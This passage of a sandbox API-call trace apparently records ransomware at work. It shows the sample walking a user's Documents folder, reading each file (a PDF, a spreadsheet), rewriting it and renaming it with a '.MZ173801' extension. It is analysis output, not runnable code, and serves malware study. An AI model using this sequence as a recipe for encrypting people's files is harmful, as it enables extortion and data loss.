"c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\trigudcr5i55m8wce.xls.mz173801")) returned 1 [0122.218] GetCurrentThreadId () returned 0x1358 [0122.218] GetCurrentThreadId () returned 0x1358 [0122.218] GetCurrentThreadId () returned 0x1358 [0122.218] GetCurrentThreadId () returned 0x1358 [0122.218] GetCurrentThreadId () returned 0x1358 [0122.218] GetCurrentThreadId () returned 0x1358 [0122.218] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1af85c0, ftCreationTime.dwHighDateTime=0x1d5e90b, ftLastAccessTime.dwLowDateTime=0xa0c8ebf0, ftLastAccessTime.dwHighDateTime=0x1d5e908, ftLastWriteTime.dwLowDateTime=0xa0c8ebf0, ftLastWriteTime.dwHighDateTime=0x1d5e908, nFileSizeHigh=0x0, nFileSizeLow=0xc97a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="WH5hIeFaZD0Ye.pdf", cAlternateFileName="WH5HIE~1.PDF")) returned 1 [0122.218] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.218] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\WH5hIeFaZD0Ye.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\wh5hiefazd0ye.pdf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1af85c0, ftCreationTime.dwHighDateTime=0x1d5e90b, ftLastAccessTime.dwLowDateTime=0xa0c8ebf0, ftLastAccessTime.dwHighDateTime=0x1d5e908, ftLastWriteTime.dwLowDateTime=0xa0c8ebf0, ftLastWriteTime.dwHighDateTime=0x1d5e908, nFileSizeHigh=0x0, nFileSizeLow=0xc97a)) returned 1 [0122.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.219] GetCurrentThreadId () returned 0x1358 [0122.219] GetCurrentThreadId () returned 0x1358 [0122.219] GetCurrentThreadId () returned 0x1358 [0122.219] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.219] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.219] GetCurrentThreadId () returned 0x1358 [0122.219] GetCurrentThreadId () returned 0x1358 [0122.219] GetCurrentThreadId () returned 0x1358 [0122.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\WH5hIeFaZD0Ye.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\wh5hiefazd0ye.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.219] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.220] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.220] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xc97a [0122.220] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.220] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xc97a, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0xc97a, lpOverlapped=0x0) returned 1 [0122.221] CloseHandle (hObject=0x408) returned 1 [0122.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\WH5hIeFaZD0Ye.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\wh5hiefazd0ye.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.223] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xc97a, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xc97a, lpOverlapped=0x0) returned 1 [0122.225] CloseHandle (hObject=0x408) returned 1 [0122.225] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\WH5hIeFaZD0Ye.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\wh5hiefazd0ye.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\WH5hIeFaZD0Ye.pdf.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\wh5hiefazd0ye.pdf.mz173801")) returned 1 [0122.225] GetCurrentThreadId () returned 0x1358 [0122.225] GetCurrentThreadId () returned 0x1358 [0122.225] GetCurrentThreadId () returned 0x1358 [0122.225] GetCurrentThreadId () returned 0x1358 [0122.225] GetCurrentThreadId () returned 0x1358 [0122.225] GetCurrentThreadId () returned 0x1358 [0122.225] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87f7df40, ftCreationTime.dwHighDateTime=0x1d5e382, ftLastAccessTime.dwLowDateTime=0x481bf920, ftLastAccessTime.dwHighDateTime=0x1d5ea25, ftLastWriteTime.dwLowDateTime=0x481bf920, ftLastWriteTime.dwHighDateTime=0x1d5ea25, nFileSizeHigh=0x0, nFileSizeLow=0x9464, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="z0bDcRFEP75Y.xlsx", cAlternateFileName="Z0BDCR~1.XLS")) returned 1 [0122.225] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.225] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\z0bDcRFEP75Y.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\z0bdcrfep75y.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87f7df40, ftCreationTime.dwHighDateTime=0x1d5e382, ftLastAccessTime.dwLowDateTime=0x481bf920, ftLastAccessTime.dwHighDateTime=0x1d5ea25, ftLastWriteTime.dwLowDateTime=0x481bf920, ftLastWriteTime.dwHighDateTime=0x1d5ea25, nFileSizeHigh=0x0, nFileSizeLow=0x9464)) returned 1 [0122.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.278] GetCurrentThreadId () returned 0x1358 [0122.278] GetCurrentThreadId () returned 0x1358 [0122.278] GetCurrentThreadId () returned 0x1358 [0122.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.279] GetCurrentThreadId () returned 0x1358 [0122.279] GetCurrentThreadId () returned 